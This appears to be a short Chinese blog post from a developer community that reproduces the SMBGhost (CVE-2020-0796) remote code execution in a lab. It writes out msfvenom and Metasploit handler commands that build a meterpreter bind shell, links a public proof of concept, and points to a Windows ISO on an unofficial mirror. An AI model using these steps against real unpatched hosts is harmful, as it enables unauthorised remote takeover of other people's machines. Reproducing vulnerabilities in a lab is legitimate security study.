AI 助理
备案控制台
开发者社区 安全 文章 正文

漏洞复现--CVE-2020-0796getshell

2023-05-19 198
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 漏洞复现--CVE-2020-0796getshell

漏洞描述:


该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。



测试环境及工具:



windows10 1903 64位下载:


http://xz1.yes025.com/iso/cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso


CVE-2020-0796 "poc"下载:


https://github.com/chompie1337/SMBGhost_RCE_PoC


生成正向连接木马:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

1b4497da3a2bfdf22db87272542f33a7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


msf监听:


use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.1.144
run

d3050d5a5230a94d2c74421aebd17d88_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



poc替换:


84225836304b213b5ca0b2088ab4f5c8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


修改内存为4G以上:


78c46d344fe86991b6ec940dabb07496_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



成功getshell


ae39373b22032e8ab7cfcff3ee9f9a8e_640_wx_fmt=gif&wxfrom=5&wx_lazy=1.gif

文章标签:
测试技术
安全
雷石安全实验室
目录
相关文章
CTO技术共享
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
CTO技术共享
1837 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
李火火
|
安全 Python Windows
RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。 该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。 从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
李火火
156 2
Vista_AX
|
XML 安全 Oracle
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Vista_AX
160 0
panda墨森
|
安全 Shell 数据安全/隐私保护
CVE-2019-15107 Webmin RCE漏洞复现
环境搭建: 进入镜像目录
panda墨森
384 0
雷石安全实验室
|
安全 Java fastjson
Log4J 漏洞复现+漏洞靶场
Log4J 漏洞复现+漏洞靶场
雷石安全实验室
548 0
panda墨森
|
安全 jenkins Java
CVE-2017-1000353 Jenkins漏洞复现系列(一)
Jenkins未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行
panda墨森
835 0
panda墨森
|
安全 Unix Linux
CVE-2020-15778 Openssh命令注入漏洞复现
scp是用于在计算机之间复制文件的程序。它使用SSH协议。在大多数Linux和Unix发行版中默认都包含它。
panda墨森
1243 0
乌鸦安全
|
安全 Java 应用服务中间件
CVE-2023-21839漏洞本地简单复现
CVE-2023-21839漏洞本地简单复现
乌鸦安全
1105 0
乌鸦安全
|
资源调度 安全 Ubuntu
CVE-2021-3560漏洞复现及原理分析
CVE-2021-3560漏洞复现及原理分析
乌鸦安全
282 0
Z2O安全攻防
|
安全 Unix Linux
CVE-2021-4034 pkexec 本地提权复现
CVE-2021-4034 pkexec 本地提权复现
Z2O安全攻防
665 0